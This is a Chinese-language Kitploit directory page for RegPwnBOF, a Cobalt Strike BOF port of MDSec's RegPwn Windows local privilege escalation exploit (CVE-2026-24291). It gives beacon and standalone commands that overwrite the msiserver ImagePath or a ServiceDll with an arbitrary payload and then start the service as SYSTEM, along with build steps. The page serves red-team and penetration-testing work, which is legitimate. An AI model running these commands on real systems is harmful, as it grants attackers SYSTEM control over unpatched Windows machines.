Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/flangvik/regpwnbof
权限提升漏洞利用后渗透利用渗透测试红队
GitHubflangvik/regpwnbof

RegPwnBOF

MDSec 的 RegPwn 的 Bof

查看仓库
1271025个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RegPwn BOF

Cobalt Strike BOF 移植自 Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach 的 RegPwn 漏洞利用程序。

这是原始 C# 漏洞利用程序的粗糙 BOF 重新实现。所有漏洞研究和利用的功劳归于 Filip Dragovic 和 MDSec。

  • 博文: https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • 原始仓库: https://github.com/mdsecactivebreach/RegPwn
  • CVE: CVE-2026-24291

功能

利用 Windows 辅助功能 ATConfig 机制中的注册表符号链接竞争条件,从普通用户上下文向受保护的 HKLM 注册表键写入任意值(本地权限提升)。

目标为 Windows 11 25H2/24H2、Windows 10 21H2 以及 Windows Server 2016/2019/2022 在 2026 年 3 月补丁之前的版本。

警告: 此漏洞利用会在竞争条件过程中锁定工作站。

默认目标

msiserver(Windows Installer)服务的 ImagePath。该服务以 SYSTEM 身份运行,且普通用户可启动。

用法

Cobalt Strike

在脚本管理器中加载 regpwn.cna,然后:

root@kitploit:~
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

独立测试

root@kitploit:~
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

漏洞利用成功后,启动服务以 SYSTEM 身份执行:

root@kitploit:~
net start msiserver

构建

需要 x86_64-w64-mingw32-gcc(MinGW-w64 交叉编译器)。

root@kitploit:~
make        # 构建 BOF (regpwn.x64.o)
make test   # 构建独立 EXE (regpwn.x64.exe)
make clean

仅支持 x64。

下载工具